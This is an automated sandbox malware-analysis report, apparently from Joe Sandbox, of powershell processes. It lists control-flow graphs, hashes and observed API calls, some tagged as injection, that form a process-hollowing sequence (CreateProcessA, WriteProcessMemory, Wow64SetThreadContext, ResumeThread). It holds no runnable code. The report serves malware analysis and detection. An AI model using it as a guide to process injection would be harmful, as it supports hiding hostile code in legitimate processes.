                                                                                                  • Not Executed
                                                                                                  control_flow_graph 256 7ffd9b8a9a1d-7ffd9b8a9a29 257 7ffd9b8a9a2b-7ffd9b8a9a33 256->257 258 7ffd9b8a9a34-7ffd9b8a9a43 256->258 257->258 259 7ffd9b8a9a45-7ffd9b8a9a4d 258->259 260 7ffd9b8a9a4e-7ffd9b8a9ae4 ResumeThread 258->260 259->260 265 7ffd9b8a9ae6 260->265 266 7ffd9b8a9aec-7ffd9b8a9b11 260->266 265->266
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2622859939.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b8a0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 5242a813844bb258d9ea1c2a2b18b881023dd5d3655788f5594d57470218251d
                                                                                                  • Instruction ID: aedc4f21b4d5ad4652b33605eb9e4b741c98dc356b1ddf00d17fc9e5d2c5f772
                                                                                                  • Opcode Fuzzy Hash: 5242a813844bb258d9ea1c2a2b18b881023dd5d3655788f5594d57470218251d
                                                                                                  • Instruction Fuzzy Hash: 23312830A0D7884FDB5ADBA898567E97FF0EF56320F0442AFD049C71A3DA786406C751
                                                                                                  Function 00007FFD9B970ADE Relevance: .1, Instructions: 147COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 297 7ffd9b970ade-7ffd9b970af4 298 7ffd9b970b0d-7ffd9b970b12 297->298 299 7ffd9b970af6-7ffd9b970b03 297->299 300 7ffd9b970baa-7ffd9b970bb4 298->300 301 7ffd9b970b18-7ffd9b970b1b 298->301 299->298 306 7ffd9b970b05-7ffd9b970b0b 299->306 304 7ffd9b970bc3-7ffd9b970c06 300->304 305 7ffd9b970bb6-7ffd9b970bc2 300->305 301->300 303 7ffd9b970b21-7ffd9b970b24 301->303 307 7ffd9b970b4b 303->307 308 7ffd9b970b26-7ffd9b970b49 303->308 306->298 311 7ffd9b970b4d-7ffd9b970b4f 307->311 308->311 311->300 313 7ffd9b970b51-7ffd9b970b5b 311->313 313->300 318 7ffd9b970b5d-7ffd9b970b73 313->318 320 7ffd9b970b7a-7ffd9b970b83 318->320 321 7ffd9b970b9c-7ffd9b970ba9 320->321 322 7ffd9b970b85-7ffd9b970b92 320->322 322->321 324 7ffd9b970b94-7ffd9b970b9a 322->324 324->321
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2633720709.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b970000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f81f372545c912f078134429faf148d89630ca263cbf1ff620986638b13e2424
                                                                                                  • Instruction ID: 45675db68a4fd751af9bff478f68282a0d82fe529e07d1348b8999acadf31b84
                                                                                                  • Opcode Fuzzy Hash: f81f372545c912f078134429faf148d89630ca263cbf1ff620986638b13e2424
                                                                                                  • Instruction Fuzzy Hash: 7E411B22B2EE1E5FEFB897B814B16B573C2DF54B15B4500BAD44DC31D6DE08AE014381
                                                                                                  Function 00007FFD9B9705EF Relevance: .1, Instructions: 67COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 370 7ffd9b9705ef-7ffd9b9705f5 371 7ffd9b970611-7ffd9b970617 370->371 372 7ffd9b9705f7-7ffd9b970604 370->372 373 7ffd9b970633-7ffd9b970637 371->373 374 7ffd9b970619-7ffd9b970631 371->374 372->371 376 7ffd9b970606-7ffd9b97060f 372->376 378 7ffd9b97063e-7ffd9b970647 373->378 374->373 376->371 381 7ffd9b970660-7ffd9b97066f 378->381 382 7ffd9b970649-7ffd9b970656 378->382 382->381 384 7ffd9b970658-7ffd9b97065e 382->384 384->381
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000D.00000002.2633720709.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_13_2_7ffd9b970000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a11bf6bd374bbfe61dfeeb8996e6b8b1821321ecd5bfb44d7c9444efbea4bd96
                                                                                                  • Instruction ID: c20cdf93c76e911d3cc66dd63cf3c8fe169a1a743fef2c08664840aca2a10e4d
                                                                                                  • Opcode Fuzzy Hash: a11bf6bd374bbfe61dfeeb8996e6b8b1821321ecd5bfb44d7c9444efbea4bd96
                                                                                                  • Instruction Fuzzy Hash: 4701A512F2EE5E1AF7B9E7AC287917466C2DFD4E20F4602B7D81CC3296ED04AD124285

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4.4%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:12
                                                                                                  Total number of Limit Nodes:0

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B980E8D Relevance: 2.5, Strings: 1, Instructions: 1256COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 7ffd9b980e8d-7ffd9b980ecc 2 7ffd9b980ece-7ffd9b980edb 0->2 3 7ffd9b980edc-7ffd9b980f19 0->3 2->3 6 7ffd9b980f1f-7ffd9b980f29 3->6 7 7ffd9b9810ad-7ffd9b981109 3->7 8 7ffd9b980f42-7ffd9b980f47 6->8 9 7ffd9b980f2b-7ffd9b980f40 6->9 32 7ffd9b981134-7ffd9b98115f 7->32 33 7ffd9b98110b-7ffd9b981122 7->33 10 7ffd9b980f4d-7ffd9b980f50 8->10 11 7ffd9b98104a-7ffd9b981054 8->11 9->8 14 7ffd9b980f52-7ffd9b980f65 10->14 15 7ffd9b980f99 10->15 16 7ffd9b981056-7ffd9b981064 11->16 17 7ffd9b981065-7ffd9b9810aa 11->17 14->7 27 7ffd9b980f6b-7ffd9b980f75 14->27 21 7ffd9b980f9b-7ffd9b980f9d 15->21 17->7 21->11 25 7ffd9b980fa3-7ffd9b980fa6 21->25 29 7ffd9b980fbd-7ffd9b980fc1 25->29 30 7ffd9b980fa8-7ffd9b980fb1 25->30 34 7ffd9b980f8e-7ffd9b980f97 27->34 35 7ffd9b980f77-7ffd9b980f84 27->35 29->11 39 7ffd9b980fc7-7ffd9b980fcd 29->39 30->29 56 7ffd9b981161 32->56 57 7ffd9b981166-7ffd9b981177 32->57 48 7ffd9b981124 33->48 49 7ffd9b981125-7ffd9b981132 33->49 34->21 35->34 41 7ffd9b980f86-7ffd9b980f8c 35->41 43 7ffd9b980fcf-7ffd9b980fdc 39->43 44 7ffd9b980fe9-7ffd9b980fef 39->44 41->34 43->44 50 7ffd9b980fde-7ffd9b980fe7 43->50 46 7ffd9b980ff1-7ffd9b981009 44->46 47 7ffd9b98100b-7ffd9b981021 44->47 46->47 63 7ffd9b981023-7ffd9b981033 47->63 64 7ffd9b98103a-7ffd9b981049 47->64 48->49 49->32 50->44 56->57 58 7ffd9b981163 56->58 59 7ffd9b98117e-7ffd9b981219 57->59 60 7ffd9b981179 57->60 58->57 69 7ffd9b98121f-7ffd9b981229 59->69 70 7ffd9b9813aa-7ffd9b981406 59->70 60->59 65 7ffd9b98117b 60->65 65->59 71 7ffd9b981242-7ffd9b981247 69->71 72 7ffd9b98122b-7ffd9b981240 69->72 94 7ffd9b981431-7ffd9b98145b 70->94 95 7ffd9b981408-7ffd9b98141f 70->95 75 7ffd9b98124d-7ffd9b981250 71->75 76 7ffd9b981347-7ffd9b981351 71->76 72->71 80 7ffd9b981252-7ffd9b981265 75->80 81 7ffd9b981299 75->81 77 7ffd9b981353-7ffd9b981361 76->77 78 7ffd9b981362-7ffd9b9813a7 76->78 78->70 80->70 89 7ffd9b98126b-7ffd9b981275 80->89 83 7ffd9b98129b-7ffd9b98129d 81->83 83->76 87 7ffd9b9812a3-7ffd9b9812a6 83->87 91 7ffd9b9812bd-7ffd9b9812c1 87->91 92 7ffd9b9812a8-7ffd9b9812b1 87->92 96 7ffd9b98128e-7ffd9b981297 89->96 97 7ffd9b981277-7ffd9b981284 89->97 91->76 102 7ffd9b9812c7-7ffd9b9812cd 91->102 92->91 119 7ffd9b981462-7ffd9b981473 94->119 120 7ffd9b98145d 94->120 109 7ffd9b981422-7ffd9b98142f 95->109 110 7ffd9b981421 95->110 96->83 97->96 106 7ffd9b981286-7ffd9b98128c 97->106 103 7ffd9b9812cf-7ffd9b9812dc 102->103 104 7ffd9b9812e9-7ffd9b9812ef 102->104 103->104 113 7ffd9b9812de-7ffd9b9812e7 103->113 111 7ffd9b9812f1-7ffd9b981309 104->111 112 7ffd9b98130b-7ffd9b98131e 104->112 106->96 109->94 110->109 111->112 123 7ffd9b981320-7ffd9b981335 112->123 124 7ffd9b981337-7ffd9b981346 112->124 113->104 126 7ffd9b98147a-7ffd9b9814a4 119->126 127 7ffd9b981475 119->127 120->119 125 7ffd9b98145f 120->125 123->124 125->119 129 7ffd9b9814b7-7ffd9b98150f 126->129 130 7ffd9b9814a6-7ffd9b9814b5 126->130 127->126 128 7ffd9b981477 127->128 128->126 134 7ffd9b98169f-7ffd9b9816fd 129->134 135 7ffd9b981515-7ffd9b98151f 129->135 130->129 161 7ffd9b9816ff-7ffd9b981716 134->161 162 7ffd9b981728-7ffd9b98174d 134->162 136 7ffd9b981521-7ffd9b98152f 135->136 137 7ffd9b981539-7ffd9b98153f 135->137 136->137 143 7ffd9b981531-7ffd9b981537 136->143 140 7ffd9b981634-7ffd9b98163e 137->140 141 7ffd9b981545-7ffd9b981548 137->141 144 7ffd9b981651-7ffd9b98169c 140->144 145 7ffd9b981640-7ffd9b981650 140->145 146 7ffd9b981591 141->146 147 7ffd9b98154a-7ffd9b98155d 141->147 143->137 144->134 149 7ffd9b981593-7ffd9b981595 146->149 147->134 155 7ffd9b981563-7ffd9b98156d 147->155 149->140 153 7ffd9b98159b-7ffd9b98159e 149->153 153->140 157 7ffd9b9815a4-7ffd9b9815a7 153->157 159 7ffd9b98156f-7ffd9b981584 155->159 160 7ffd9b981586-7ffd9b98158f 155->160 157->140 163 7ffd9b9815ad-7ffd9b9815e1 157->163 159->160 160->149 170 7ffd9b981719-7ffd9b981726 161->170 171 7ffd9b981718 161->171 174 7ffd9b98174f-7ffd9b981755 162->174 175 7ffd9b981759-7ffd9b981765 162->175 163->140 182 7ffd9b9815e3-7ffd9b9815e9 163->182 170->162 171->170 174->175 178 7ffd9b981771-7ffd9b9817f4 175->178 179 7ffd9b981767-7ffd9b98176d 175->179 188 7ffd9b98183b-7ffd9b981845 178->188 189 7ffd9b9817f6-7ffd9b981838 178->189 179->178 184 7ffd9b9815eb-7ffd9b981606 182->184 185 7ffd9b981608-7ffd9b98161e 182->185 184->185 192 7ffd9b981624-7ffd9b981633 185->192 190 7ffd9b981850-7ffd9b98189b 188->190 191 7ffd9b981847-7ffd9b98184f 188->191
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2746792345.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: J_H
                                                                                                  • API String ID: 0-3943139310
                                                                                                  • Opcode ID: fa1dada4720692a55a0b2d870a90282b76e19fe0750d823e7bdcfb05be6f3edd
                                                                                                  • Instruction ID: 80003f927aebc6aa75ad1fa5fc9241841ae0c7822bd13f907b2b4b055674c9f8
                                                                                                  • Opcode Fuzzy Hash: fa1dada4720692a55a0b2d870a90282b76e19fe0750d823e7bdcfb05be6f3edd
                                                                                                  • Instruction Fuzzy Hash: B6826A22B1EFD91FE766876858655B43FE1EF5A224B0A01FFD08DC71E3D928AD068341
                                                                                                  Function 00007FFD9B8BA634 Relevance: 1.9, APIs: 1, Instructions: 386processCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 201 7ffd9b8ba634-7ffd9b8ba63b 202 7ffd9b8ba646-7ffd9b8ba714 201->202 203 7ffd9b8ba63d-7ffd9b8ba645 201->203 207 7ffd9b8ba716-7ffd9b8ba725 202->207 208 7ffd9b8ba772-7ffd9b8ba7a4 202->208 203->202 207->208 209 7ffd9b8ba727-7ffd9b8ba72a 207->209 213 7ffd9b8ba7a6-7ffd9b8ba7b5 208->213 214 7ffd9b8ba802-7ffd9b8ba876 208->214 211 7ffd9b8ba72c-7ffd9b8ba73f 209->211 212 7ffd9b8ba764-7ffd9b8ba76c 209->212 215 7ffd9b8ba743-7ffd9b8ba756 211->215 216 7ffd9b8ba741 211->216 212->208 213->214 217 7ffd9b8ba7b7-7ffd9b8ba7ba 213->217 224 7ffd9b8ba878-7ffd9b8ba887 214->224 225 7ffd9b8ba8d4-7ffd9b8ba9dd CreateProcessA 214->225 215->215 218 7ffd9b8ba758-7ffd9b8ba760 215->218 216->215 219 7ffd9b8ba7bc-7ffd9b8ba7cf 217->219 220 7ffd9b8ba7f4-7ffd9b8ba7fc 217->220 218->212 222 7ffd9b8ba7d3-7ffd9b8ba7e6 219->222 223 7ffd9b8ba7d1 219->223 220->214 222->222 226 7ffd9b8ba7e8-7ffd9b8ba7f0 222->226 223->222 224->225 227 7ffd9b8ba889-7ffd9b8ba88c 224->227 236 7ffd9b8ba9e5-7ffd9b8baa13 225->236 237 7ffd9b8ba9df 225->237 226->220 229 7ffd9b8ba8c6-7ffd9b8ba8ce 227->229 230 7ffd9b8ba88e-7ffd9b8ba8a1 227->230 229->225 232 7ffd9b8ba8a5-7ffd9b8ba8b8 230->232 233 7ffd9b8ba8a3 230->233 232->232 234 7ffd9b8ba8ba-7ffd9b8ba8c2 232->234 233->232 234->229 237->236
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: 60cb0fa6bb644f305a6f67e323fd0ec85f30456337f4c01e80f2b858707c4ecb
                                                                                                  • Instruction ID: 69f48f185515dd8225c971ae9da69dbde522bd714351b7a3546f2256f6f493af
                                                                                                  • Opcode Fuzzy Hash: 60cb0fa6bb644f305a6f67e323fd0ec85f30456337f4c01e80f2b858707c4ecb
                                                                                                  • Instruction Fuzzy Hash: F3C1A630918A8D8FDB78DF28CC567E977E1FB58310F15422AD84EC7291DE74AA418BC2
                                                                                                  Function 00007FFD9B8BA2D4 Relevance: 1.7, APIs: 1, Instructions: 151injectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 240 7ffd9b8ba2d4-7ffd9b8ba2db 241 7ffd9b8ba2e6-7ffd9b8ba375 240->241 242 7ffd9b8ba2dd-7ffd9b8ba2e5 240->242 246 7ffd9b8ba377-7ffd9b8ba37c 241->246 247 7ffd9b8ba37f-7ffd9b8ba3d4 WriteProcessMemory 241->247 242->241 246->247 249 7ffd9b8ba3d6 247->249 250 7ffd9b8ba3dc-7ffd9b8ba40d 247->250 249->250
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MemoryProcessWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3559483778-0
                                                                                                  • Opcode ID: a594e4b4a918b8cee54253dcc15ce9c9fc01563d55bcb135e4263471f4ca568d
                                                                                                  • Instruction ID: ebc90d2e9574eddf9c28711b76ef3a945c238ae56604ce740dac524eb3ee1375
                                                                                                  • Opcode Fuzzy Hash: a594e4b4a918b8cee54253dcc15ce9c9fc01563d55bcb135e4263471f4ca568d
                                                                                                  • Instruction Fuzzy Hash: 2541D73191CB5C4FDB289FA898466F97BE0EB59720F00426FE459D3292DE74A8458BC1
                                                                                                  Function 00007FFD9B8BA0C8 Relevance: 1.6, APIs: 1, Instructions: 130threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 252 7ffd9b8ba0c8-7ffd9b8ba0cf 253 7ffd9b8ba0da-7ffd9b8ba14d 252->253 254 7ffd9b8ba0d1-7ffd9b8ba0d9 252->254 258 7ffd9b8ba157-7ffd9b8ba192 Wow64SetThreadContext 253->258 259 7ffd9b8ba14f-7ffd9b8ba154 253->259 254->253 261 7ffd9b8ba19a-7ffd9b8ba1c9 258->261 262 7ffd9b8ba194 258->262 259->258 262->261
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: c41531326e62d7d6f8422ecad22b79f2f0ac1785e5cdccebba1dff6d26feb6a3
                                                                                                  • Instruction ID: 6873526b855cba1c58115aefdccd14e6b30b2656e690aa2ca1a238aebf5aff8e
                                                                                                  • Opcode Fuzzy Hash: c41531326e62d7d6f8422ecad22b79f2f0ac1785e5cdccebba1dff6d26feb6a3
                                                                                                  • Instruction Fuzzy Hash: 9E311632D0CB1C4FDB289BA898466FA7BE1EF55321F04427FD04AC3292DF74A4068791
                                                                                                  Function 00007FFD9B8B9FCD Relevance: 1.6, APIs: 1, Instructions: 119threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 264 7ffd9b8b9fcd-7ffd9b8b9fd9 265 7ffd9b8b9fdb-7ffd9b8b9fe3 264->265 266 7ffd9b8b9fe4-7ffd9b8b9ff3 264->266 265->266 267 7ffd9b8b9ff5-7ffd9b8b9ffd 266->267 268 7ffd9b8b9ffe-7ffd9b8ba094 ResumeThread 266->268 267->268 273 7ffd9b8ba096 268->273 274 7ffd9b8ba09c-7ffd9b8ba0c1 268->274 273->274
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2733173885.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: c8d450609cf57f4204678e0e31de08b2f4237cc9b14efe536e53535d1156df47
                                                                                                  • Instruction ID: 5e4977a445712f0574b380401bc7b8e61298be3d26203d537c7bcec16ff0f15e
                                                                                                  • Opcode Fuzzy Hash: c8d450609cf57f4204678e0e31de08b2f4237cc9b14efe536e53535d1156df47
                                                                                                  • Instruction Fuzzy Hash: 2B31163190D78C8FDB1ADBB888567E97FA0EF56320F0842AFD049C71A3DA785406CB91
                                                                                                  Function 00007FFD9B980ADE Relevance: .1, Instructions: 147COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 335 7ffd9b980ade-7ffd9b980af4 336 7ffd9b980b0d-7ffd9b980b12 335->336 337 7ffd9b980af6-7ffd9b980b03 335->337 339 7ffd9b980baa-7ffd9b980bb4 336->339 340 7ffd9b980b18-7ffd9b980b1b 336->340 337->336 344 7ffd9b980b05-7ffd9b980b0b 337->344 342 7ffd9b980bc3-7ffd9b980c06 339->342 343 7ffd9b980bb6-7ffd9b980bc2 339->343 340->339 341 7ffd9b980b21-7ffd9b980b24 340->341 345 7ffd9b980b4b 341->345 346 7ffd9b980b26-7ffd9b980b49 341->346 344->336 348 7ffd9b980b4d-7ffd9b980b4f 345->348 346->348 348->339 351 7ffd9b980b51-7ffd9b980b5b 348->351 351->339 356 7ffd9b980b5d-7ffd9b980b73 351->356 358 7ffd9b980b7a-7ffd9b980b83 356->358 359 7ffd9b980b9c-7ffd9b980ba9 358->359 360 7ffd9b980b85-7ffd9b980b92 358->360 360->359 362 7ffd9b980b94-7ffd9b980b9a 360->362 362->359
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2746792345.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 15c8daf414aceea7ac699f5956f763d7db5652072f1d9a93492f1c2a02729da3
                                                                                                  • Instruction ID: 68c24b800b37b2e8b322751a9b501c0a46bc33ca0dbb16e210f8387d45decdd9
                                                                                                  • Opcode Fuzzy Hash: 15c8daf414aceea7ac699f5956f763d7db5652072f1d9a93492f1c2a02729da3
                                                                                                  • Instruction Fuzzy Hash: 0F41F822B1AE5E1FEFB897B814656B563C2EF54B55B0900BAD44DC31F6EE18AD014381
                                                                                                  Function 00007FFD9B9805EF Relevance: .1, Instructions: 67COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 395 7ffd9b9805ef-7ffd9b9805f5 396 7ffd9b980611-7ffd9b980617 395->396 397 7ffd9b9805f7-7ffd9b980604 395->397 398 7ffd9b980633-7ffd9b980637 396->398 399 7ffd9b980619-7ffd9b980631 396->399 397->396 401 7ffd9b980606-7ffd9b98060f 397->401 403 7ffd9b98063e-7ffd9b980647 398->403 399->398 401->396 406 7ffd9b980660-7ffd9b98066f 403->406 407 7ffd9b980649-7ffd9b980656 403->407 407->406 409 7ffd9b980658-7ffd9b98065e 407->409 409->406
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000013.00000002.2746792345.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24f296ba25fdf45aa62fcc59a5130fa698bbfd8694d3548b3f861cde6ad82a42
                                                                                                  • Instruction ID: 097329ae9479464e86a1eca165380b181a5f9c7266c86e4be4265e0f2b734a60
                                                                                                  • Opcode Fuzzy Hash: 24f296ba25fdf45aa62fcc59a5130fa698bbfd8694d3548b3f861cde6ad82a42
                                                                                                  • Instruction Fuzzy Hash: 7D01A512F2EE5E1AF3B997AC282917466C1DFD4E20F4602B7D81CC3196ED14AD124285

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.7%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:2%
                                                                                                  Total number of Nodes:1659
                                                                                                  Total number of Limit Nodes:5
                                                                                                  execution_graph 6731 10007a80 6732 10007a8d 6731->6732 6733 1000637b _free 20 API calls 6732->6733 6734 10007aa7 6733->6734 6735 1000571e _free 20 API calls 6734->6735 6736 10007ab3 6735->6736 6737 1000637b _free 20 API calls 6736->6737 6741 10007ad9 6736->6741 6738 10007acd 6737->6738 6740 1000571e _free 20 API calls 6738->6740 6739 10005eb7 11 API calls 6739->6741 6740->6741 6741->6739 6742 10007ae5 6741->6742 7171 10007103 GetCommandLineA GetCommandLineW 7172 10005303 7175 100050a5 7172->7175 7184 1000502f 7175->7184 7178 1000502f 5 API calls 7179 100050c3 7178->7179 7180 10005000 20 API calls 7179->7180 7181 100050ce 7180->7181 7182 10005000 20 API calls 7181->7182 7183 100050d9 7182->7183 7185 10005048 7184->7185 7186 10002ada _ValidateLocalCookies 5 API calls 7185->7186 7187 10005069 7186->7187 7187->7178 6743 10009c88 6744 10009c95 6743->6744 6745 10009ca9 6744->6745 6750 10009ccd 6744->6750 6754 10009cc0 6744->6754 6746 10009cb0 6745->6746 6747 10009cc4 6745->6747 6749 10006368 _free 20 API calls 6746->6749 6748 10006332 __dosmaperr 20 API calls 6747->6748 6748->6754 6752 10009cb5 6749->6752 6753 10006368 _free 20 API calls 6750->6753 6750->6754 6751 10002ada _ValidateLocalCookies 5 API calls 6755 10009d15 6751->6755 6756 10006355 __dosmaperr 20 API calls 6752->6756 6757 10009cf2 6753->6757 6754->6751 6756->6754 6758 10006355 __dosmaperr 20 API calls 6757->6758 6758->6754 6759 10008a89 6762 10006d60 6759->6762 6763 10006d69 6762->6763 6764 10006d72 6762->6764 6766 10006c5f 6763->6766 6767 10005af6 _abort 38 API calls 6766->6767 6768 10006c6c 6767->6768 6769 10006d7e 38 API calls 6768->6769 6770 10006c74 6769->6770 6786 100069f3 6770->6786 6773 10006c8b 6773->6764 6778 1000571e _free 20 API calls 6778->6773 6779 10006cc9 6780 10006368 _free 20 API calls 6779->6780 6785 10006cce 6780->6785 6781 10006d12 6781->6785 6810 100068c9 6781->6810 6782 10006ce6 6782->6781 6783 1000571e _free 20 API calls 6782->6783 6783->6781 6785->6778 6787 100054a7 38 API calls 6786->6787 6788 10006a05 6787->6788 6789 10006a14 GetOEMCP 6788->6789 6790 10006a26 6788->6790 6792 10006a3d 6789->6792 6791 10006a2b GetACP 6790->6791 6790->6792 6791->6792 6792->6773 6793 100056d0 6792->6793 6794 1000570e 6793->6794 6798 100056de _free 6793->6798 6795 10006368 _free 20 API calls 6794->6795 6797 1000570c 6795->6797 6796 100056f9 RtlAllocateHeap 6796->6797 6796->6798 6797->6785 6800 10006e20 6797->6800 6798->6794 6798->6796 6799 1000474f _free 7 API calls 6798->6799 6799->6798 6801 100069f3 40 API calls 6800->6801 6802 10006e3f 6801->6802 6804 10006e90 IsValidCodePage 6802->6804 6807 10006e46 6802->6807 6809 10006eb5 ___scrt_fastfail 6802->6809 6803 10002ada _ValidateLocalCookies 5 API calls 6805 10006cc1 6803->6805 6806 10006ea2 GetCPInfo 6804->6806 6804->6807 6805->6779 6805->6782 6806->6807 6806->6809 6807->6803 6813 10006acb GetCPInfo 6809->6813 6886 10006886 6810->6886 6812 100068ed 6812->6785 6815 10006b05 6813->6815 6822 10006baf 6813->6822 6823 100086e4 6815->6823 6817 10002ada _ValidateLocalCookies 5 API calls 6819 10006c5b 6817->6819 6819->6807 6821 10008a3e 43 API calls 6821->6822 6822->6817 6824 100054a7 38 API calls 6823->6824 6825 10008704 MultiByteToWideChar 6824->6825 6827 10008742 6825->6827 6828 100087da 6825->6828 6832 100056d0 21 API calls 6827->6832 6833 10008763 ___scrt_fastfail 6827->6833 6829 10002ada _ValidateLocalCookies 5 API calls 6828->6829 6830 10006b66 6829->6830 6837 10008a3e 6830->6837 6831 100087d4 6842 10008801 6831->6842 6832->6833 6833->6831 6835 100087a8 MultiByteToWideChar 6833->6835 6835->6831 6836 100087c4 GetStringTypeW 6835->6836 6836->6831 6838 100054a7 38 API calls 6837->6838 6839 10008a51 6838->6839 6846 10008821 6839->6846 6843 1000880d 6842->6843 6844 1000881e 6842->6844 6843->6844 6845 1000571e _free 20 API calls 6843->6845 6844->6828 6845->6844 6848 1000883c 6846->6848 6847 10008862 MultiByteToWideChar 6849 10008a16 6847->6849 6850 1000888c 6847->6850 6848->6847 6851 10002ada _ValidateLocalCookies 5 API calls 6849->6851 6855 100056d0 21 API calls 6850->6855 6857 100088ad 6850->6857 6852 10006b87 6851->6852 6852->6821 6853 100088f6 MultiByteToWideChar 6854 10008962 6853->6854 6856 1000890f 6853->6856 6859 10008801 __freea 20 API calls 6854->6859 6855->6857 6873 10005f19 6856->6873 6857->6853 6857->6854 6859->6849 6861 10008971 6863 100056d0 21 API calls 6861->6863 6867 10008992 6861->6867 6862 10008939 6862->6854 6864 10005f19 11 API calls 6862->6864 6863->6867 6864->6854 6865 10008a07 6866 10008801 __freea 20 API calls 6865->6866 6866->6854 6867->6865 6868 10005f19 11 API calls 6867->6868 6869 100089e6 6868->6869 6869->6865 6870 100089f5 